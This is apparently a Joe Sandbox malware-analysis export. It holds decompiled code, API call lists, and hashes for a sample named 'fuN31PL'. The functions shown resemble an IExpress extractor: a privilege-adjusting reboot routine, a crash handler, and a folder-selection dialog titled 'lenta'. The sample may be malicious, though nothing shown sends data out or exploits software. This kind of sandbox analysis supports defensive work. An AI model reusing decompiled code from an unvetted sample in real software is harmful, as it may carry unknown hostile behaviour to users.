                                                                                                                                                                                                                                              				_t38 = __edi;
                                                                                                                                                                                                                                              				_t30 = __ecx;
                                                                                                                                                                                                                                              				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						if( *0x1a9a40 != 0) {
                                                                                                                                                                                                                                              							_pop(_t30);
                                                                                                                                                                                                                                              							_t44 = _t46;
                                                                                                                                                                                                                                              							_t13 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                              							_push(_t38);
                                                                                                                                                                                                                                              							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                              								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                              								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                              								_v12 = 2;
                                                                                                                                                                                                                                              								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                              								CloseHandle(_v28);
                                                                                                                                                                                                                                              								_t41 = _t41;
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								if(_t21 != 0) {
                                                                                                                                                                                                                                              									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                              										_t25 = 1;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t37 = 0x4f7;
                                                                                                                                                                                                                                              										goto L3;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t37 = 0x4f6;
                                                                                                                                                                                                                                              									goto L4;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t37 = 0x4f5;
                                                                                                                                                                                                                                              								L3:
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								L4:
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								E001A44B9(0, _t37);
                                                                                                                                                                                                                                              								_t25 = 0;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_pop(_t40);
                                                                                                                                                                                                                                              							return E001A6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t37 = 0x522;
                                                                                                                                                                                                                                              						_t28 = E001A44B9(0, 0x522, 0x1a1140, 0, 0x40, 4);
                                                                                                                                                                                                                                              						if(_t28 != 6) {
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					__eax = E001A1EA7(__ecx);
                                                                                                                                                                                                                                              					if(__eax != 2) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						return _t28;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}

















                                                                                                                                                                                                                                              0x001a1f90
                                                                                                                                                                                                                                              0x001a1f90
                                                                                                                                                                                                                                              0x001a1f93
                                                                                                                                                                                                                                              0x001a1f98
                                                                                                                                                                                                                                              0x001a1fa4
                                                                                                                                                                                                                                              0x001a1fa7
                                                                                                                                                                                                                                              0x001a1fc5
                                                                                                                                                                                                                                              0x001a1fcd
                                                                                                                                                                                                                                              0x001a1fdb
                                                                                                                                                                                                                                              0x001a1ee5
                                                                                                                                                                                                                                              0x001a1eea
                                                                                                                                                                                                                                              0x001a1ef1
                                                                                                                                                                                                                                              0x001a1ef4
                                                                                                                                                                                                                                              0x001a1f0c
                                                                                                                                                                                                                                              0x001a1f2e
                                                                                                                                                                                                                                              0x001a1f3a
                                                                                                                                                                                                                                              0x001a1f46
                                                                                                                                                                                                                                              0x001a1f4d
                                                                                                                                                                                                                                              0x001a1f58
                                                                                                                                                                                                                                              0x001a1f60
                                                                                                                                                                                                                                              0x001a1f61
                                                                                                                                                                                                                                              0x001a1f62
                                                                                                                                                                                                                                              0x001a1f75
                                                                                                                                                                                                                                              0x001a1f80
                                                                                                                                                                                                                                              0x001a1f77
                                                                                                                                                                                                                                              0x001a1f77
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1f77
                                                                                                                                                                                                                                              0x001a1f64
                                                                                                                                                                                                                                              0x001a1f64
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1f64
                                                                                                                                                                                                                                              0x001a1f0e
                                                                                                                                                                                                                                              0x001a1f0e
                                                                                                                                                                                                                                              0x001a1f13
                                                                                                                                                                                                                                              0x001a1f13
                                                                                                                                                                                                                                              0x001a1f14
                                                                                                                                                                                                                                              0x001a1f14
                                                                                                                                                                                                                                              0x001a1f16
                                                                                                                                                                                                                                              0x001a1f17
                                                                                                                                                                                                                                              0x001a1f1a
                                                                                                                                                                                                                                              0x001a1f1f
                                                                                                                                                                                                                                              0x001a1f1f
                                                                                                                                                                                                                                              0x001a1f86
                                                                                                                                                                                                                                              0x001a1f8f
                                                                                                                                                                                                                                              0x001a1fcf
                                                                                                                                                                                                                                              0x001a1fd3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1fd3
                                                                                                                                                                                                                                              0x001a1fa9
                                                                                                                                                                                                                                              0x001a1fb4
                                                                                                                                                                                                                                              0x001a1fbb
                                                                                                                                                                                                                                              0x001a1fc3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1fc3
                                                                                                                                                                                                                                              0x001a1f9a
                                                                                                                                                                                                                                              0x001a1f9a
                                                                                                                                                                                                                                              0x001a1fa2
                                                                                                                                                                                                                                              0x001a1fd9
                                                                                                                                                                                                                                              0x001a1fda
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1fa2

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 001A1EFB
                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 001A1F02
                                                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 001A1FD3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                              • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                              • Opcode ID: 38e30d6b36c35a8906d4da4572c5948824dc2cdfce52d7e36e71da21d832e5fa
                                                                                                                                                                                                                                              • Instruction ID: 7d4eb5eb27f84e07a8668df5034bd42b4246aca95cad8d9a04e9c972df8b12a3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38e30d6b36c35a8906d4da4572c5948824dc2cdfce52d7e36e71da21d832e5fa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C521B2B9B402457FDB209BA19C4AFBF7AB8EB87B11F600019FA02E6581D7748849D661
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                              				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                              			}



                                                                                                                                                                                                                                              0x001a6cf7
                                                                                                                                                                                                                                              0x001a6d00
                                                                                                                                                                                                                                              0x001a6d19

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,001A6E26,001A1000), ref: 001A6CF7
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(001A6E26,?,001A6E26,001A1000), ref: 001A6D00
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,001A6E26,001A1000), ref: 001A6D0B
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,001A6E26,001A1000), ref: 001A6D12
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                                                                              • Opcode ID: 1ea5b3f2335e5ce053aa73fd8b86f9e91f41db2e343e39b5b8d2f1f260b6b7e2
                                                                                                                                                                                                                                              • Instruction ID: 0e728b5cd03fe1bb4ca409aaa17d49f767ae58d32cd5c006ff5fe535e090155d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ea5b3f2335e5ce053aa73fd8b86f9e91f41db2e343e39b5b8d2f1f260b6b7e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84D0C932000108BBDB412BE1EC0CA593F28EF4A212F844000F31982820CB324491CB52
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                                                                                                              			E001A3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				int _t20;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				int _t23;
                                                                                                                                                                                                                                              				char _t24;
                                                                                                                                                                                                                                              				long _t25;
                                                                                                                                                                                                                                              				int _t27;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                                                              				int _t33;
                                                                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                                                                              				int _t37;
                                                                                                                                                                                                                                              				int _t38;
                                                                                                                                                                                                                                              				int _t39;
                                                                                                                                                                                                                                              				void* _t42;
                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                              				CHAR* _t49;
                                                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				struct HWND__* _t64;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t64 = _a4;
                                                                                                                                                                                                                                              				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t6 == 0) {
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					L38:
                                                                                                                                                                                                                                              					EndDialog(_t64, ??);
                                                                                                                                                                                                                                              					L39:
                                                                                                                                                                                                                                              					__eflags = 1;
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t42 = 1;
                                                                                                                                                                                                                                              				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                              				if(_t10 == 0) {
                                                                                                                                                                                                                                              					E001A43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                              					SetWindowTextA(_t64, "lenta");
                                                                                                                                                                                                                                              					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                              					__eflags =  *0x1a9a40 - _t42; // 0x3
                                                                                                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                                                                                                              						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L36:
                                                                                                                                                                                                                                              					return _t42;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t10 == _t42) {
                                                                                                                                                                                                                                              					_t20 = _a12 - 1;
                                                                                                                                                                                                                                              					__eflags = _t20;
                                                                                                                                                                                                                                              					if(_t20 == 0) {
                                                                                                                                                                                                                                              						_t21 = GetDlgItemTextA(_t64, 0x835, 0x1a91e4, 0x104);
                                                                                                                                                                                                                                              						__eflags = _t21;
                                                                                                                                                                                                                                              						if(_t21 == 0) {
                                                                                                                                                                                                                                              							L32:
                                                                                                                                                                                                                                              							_t58 = 0x4bf;
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0x10);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							L25:
                                                                                                                                                                                                                                              							E001A44B9(_t64, _t58);
                                                                                                                                                                                                                                              							goto L39;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t49 = 0x1a91e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t23 =  *_t49;
                                                                                                                                                                                                                                              							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                              							__eflags = _t23;
                                                                                                                                                                                                                                              						} while (_t23 != 0);
                                                                                                                                                                                                                                              						__eflags = _t49 - 0x1a91e5 - 3;
                                                                                                                                                                                                                                              						if(_t49 - 0x1a91e5 < 3) {
                                                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t24 =  *0x1a91e5; // 0x3a
                                                                                                                                                                                                                                              						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                              						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                              							L21:
                                                                                                                                                                                                                                              							_t25 = GetFileAttributesA(0x1a91e4);
                                                                                                                                                                                                                                              							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                              							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              								L26:
                                                                                                                                                                                                                                              								E001A658A(0x1a91e4, 0x104, 0x1a1140);
                                                                                                                                                                                                                                              								_t27 = E001A58C8(0x1a91e4);
                                                                                                                                                                                                                                              								__eflags = _t27;
                                                                                                                                                                                                                                              								if(_t27 != 0) {
                                                                                                                                                                                                                                              									__eflags =  *0x1a91e4 - 0x5c;
                                                                                                                                                                                                                                              									if( *0x1a91e4 != 0x5c) {
                                                                                                                                                                                                                                              										L30:
                                                                                                                                                                                                                                              										_t30 = E001A597D(0x1a91e4, 1, _t64, 1);
                                                                                                                                                                                                                                              										__eflags = _t30;
                                                                                                                                                                                                                                              										if(_t30 == 0) {
                                                                                                                                                                                                                                              											L35:
                                                                                                                                                                                                                                              											_t42 = 1;
                                                                                                                                                                                                                                              											__eflags = 1;
                                                                                                                                                                                                                                              											goto L36;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										L31:
                                                                                                                                                                                                                                              										_t42 = 1;
                                                                                                                                                                                                                                              										EndDialog(_t64, 1);
                                                                                                                                                                                                                                              										goto L36;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									__eflags =  *0x1a91e5 - 0x5c;
                                                                                                                                                                                                                                              									if( *0x1a91e5 == 0x5c) {
                                                                                                                                                                                                                                              										goto L31;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L30;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_t58 = 0x4be;
                                                                                                                                                                                                                                              								goto L25;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t32 = E001A44B9(_t64, 0x54a, 0x1a91e4, 0, 0x20, 4);
                                                                                                                                                                                                                                              							__eflags = _t32 - 6;
                                                                                                                                                                                                                                              							if(_t32 != 6) {
                                                                                                                                                                                                                                              								goto L35;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t33 = CreateDirectoryA(0x1a91e4, 0);
                                                                                                                                                                                                                                              							__eflags = _t33;
                                                                                                                                                                                                                                              							if(_t33 != 0) {
                                                                                                                                                                                                                                              								goto L26;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0x10);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0x1a91e4);
                                                                                                                                                                                                                                              							_t58 = 0x4cb;
                                                                                                                                                                                                                                              							goto L25;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags =  *0x1a91e4 - 0x5c;
                                                                                                                                                                                                                                              						if( *0x1a91e4 != 0x5c) {
                                                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                              						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t34 = _t20 - 1;
                                                                                                                                                                                                                                              					__eflags = _t34;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						EndDialog(_t64, 0);
                                                                                                                                                                                                                                              						 *0x1a9124 = 0x800704c7;
                                                                                                                                                                                                                                              						goto L39;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                              					if(_t34 != 0x834) {
                                                                                                                                                                                                                                              						goto L36;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t37 = LoadStringA( *0x1a9a3c, 0x3e8, 0x1a8598, 0x200);
                                                                                                                                                                                                                                              					__eflags = _t37;
                                                                                                                                                                                                                                              					if(_t37 != 0) {
                                                                                                                                                                                                                                              						_t38 = E001A4224(_t64, _t46, _t46);
                                                                                                                                                                                                                                              						__eflags = _t38;
                                                                                                                                                                                                                                              						if(_t38 == 0) {
                                                                                                                                                                                                                                              							goto L36;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t39 = SetDlgItemTextA(_t64, 0x835, 0x1a87a0);
                                                                                                                                                                                                                                              						__eflags = _t39;
                                                                                                                                                                                                                                              						if(_t39 != 0) {
                                                                                                                                                                                                                                              							goto L36;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t63 = 0x4c0;
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						E001A44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						goto L38;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t63 = 0x4b1;
                                                                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}

























                                                                                                                                                                                                                                              0x001a321b
                                                                                                                                                                                                                                              0x001a321e
                                                                                                                                                                                                                                              0x001a3221
                                                                                                                                                                                                                                              0x001a343c
                                                                                                                                                                                                                                              0x001a343e
                                                                                                                                                                                                                                              0x001a343f
                                                                                                                                                                                                                                              0x001a3445
                                                                                                                                                                                                                                              0x001a3447
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3447
                                                                                                                                                                                                                                              0x001a3229
                                                                                                                                                                                                                                              0x001a322a
                                                                                                                                                                                                                                              0x001a322f
                                                                                                                                                                                                                                              0x001a33ec
                                                                                                                                                                                                                                              0x001a33f7
                                                                                                                                                                                                                                              0x001a3410
                                                                                                                                                                                                                                              0x001a3416
                                                                                                                                                                                                                                              0x001a341d
                                                                                                                                                                                                                                              0x001a342d
                                                                                                                                                                                                                                              0x001a342d
                                                                                                                                                                                                                                              0x001a3438
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3438
                                                                                                                                                                                                                                              0x001a3237
                                                                                                                                                                                                                                              0x001a3243
                                                                                                                                                                                                                                              0x001a3243
                                                                                                                                                                                                                                              0x001a3246
                                                                                                                                                                                                                                              0x001a32ee
                                                                                                                                                                                                                                              0x001a32f4
                                                                                                                                                                                                                                              0x001a32f6
                                                                                                                                                                                                                                              0x001a33d4
                                                                                                                                                                                                                                              0x001a33d6
                                                                                                                                                                                                                                              0x001a33db
                                                                                                                                                                                                                                              0x001a33dc
                                                                                                                                                                                                                                              0x001a33de
                                                                                                                                                                                                                                              0x001a33df
                                                                                                                                                                                                                                              0x001a3370
                                                                                                                                                                                                                                              0x001a3372
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3372
                                                                                                                                                                                                                                              0x001a32fc
                                                                                                                                                                                                                                              0x001a3301
                                                                                                                                                                                                                                              0x001a3301
                                                                                                                                                                                                                                              0x001a3303
                                                                                                                                                                                                                                              0x001a3304
                                                                                                                                                                                                                                              0x001a3304
                                                                                                                                                                                                                                              0x001a330a
                                                                                                                                                                                                                                              0x001a330d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3313
                                                                                                                                                                                                                                              0x001a3318
                                                                                                                                                                                                                                              0x001a331a
                                                                                                                                                                                                                                              0x001a3331
                                                                                                                                                                                                                                              0x001a3332
                                                                                                                                                                                                                                              0x001a333a
                                                                                                                                                                                                                                              0x001a333d
                                                                                                                                                                                                                                              0x001a337c
                                                                                                                                                                                                                                              0x001a3388
                                                                                                                                                                                                                                              0x001a338f
                                                                                                                                                                                                                                              0x001a3394
                                                                                                                                                                                                                                              0x001a3396
                                                                                                                                                                                                                                              0x001a33a4
                                                                                                                                                                                                                                              0x001a33ab
                                                                                                                                                                                                                                              0x001a33b6
                                                                                                                                                                                                                                              0x001a33be
                                                                                                                                                                                                                                              0x001a33c3
                                                                                                                                                                                                                                              0x001a33c5
                                                                                                                                                                                                                                              0x001a3435
                                                                                                                                                                                                                                              0x001a3437
                                                                                                                                                                                                                                              0x001a3437
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3437
                                                                                                                                                                                                                                              0x001a33c7
                                                                                                                                                                                                                                              0x001a33c9
                                                                                                                                                                                                                                              0x001a33cc
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a33cc
                                                                                                                                                                                                                                              0x001a33ad
                                                                                                                                                                                                                                              0x001a33b4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a33b4
                                                                                                                                                                                                                                              0x001a3398
                                                                                                                                                                                                                                              0x001a3399
                                                                                                                                                                                                                                              0x001a339b
                                                                                                                                                                                                                                              0x001a339c
                                                                                                                                                                                                                                              0x001a339d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a339d
                                                                                                                                                                                                                                              0x001a334c
                                                                                                                                                                                                                                              0x001a3351
                                                                                                                                                                                                                                              0x001a3354
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a335c
                                                                                                                                                                                                                                              0x001a3362
                                                                                                                                                                                                                                              0x001a3364
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3366
                                                                                                                                                                                                                                              0x001a3367
                                                                                                                                                                                                                                              0x001a3369
                                                                                                                                                                                                                                              0x001a336a
                                                                                                                                                                                                                                              0x001a336b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a336b
                                                                                                                                                                                                                                              0x001a331c
                                                                                                                                                                                                                                              0x001a3323
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3329
                                                                                                                                                                                                                                              0x001a332b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a332b
                                                                                                                                                                                                                                              0x001a324c
                                                                                                                                                                                                                                              0x001a324c
                                                                                                                                                                                                                                              0x001a324f
                                                                                                                                                                                                                                              0x001a32c8
                                                                                                                                                                                                                                              0x001a32ce
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a32ce
                                                                                                                                                                                                                                              0x001a3251
                                                                                                                                                                                                                                              0x001a3256
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3271
                                                                                                                                                                                                                                              0x001a3277
                                                                                                                                                                                                                                              0x001a3279
                                                                                                                                                                                                                                              0x001a3298
                                                                                                                                                                                                                                              0x001a329d
                                                                                                                                                                                                                                              0x001a329f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a32b0
                                                                                                                                                                                                                                              0x001a32b6
                                                                                                                                                                                                                                              0x001a32b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a32be
                                                                                                                                                                                                                                              0x001a3280
                                                                                                                                                                                                                                              0x001a3289
                                                                                                                                                                                                                                              0x001a328e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a328e
                                                                                                                                                                                                                                              0x001a327b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a327b
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadStringA.USER32(000003E8,001A8598,00000200), ref: 001A3271
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 001A33E2
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 001A33F7
                                                                                                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 001A3410
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000836), ref: 001A3426
                                                                                                                                                                                                                                              • EnableWindow.USER32(00000000), ref: 001A342D
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 001A343F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lenta
                                                                                                                                                                                                                                              • API String ID: 2418873061-7669773
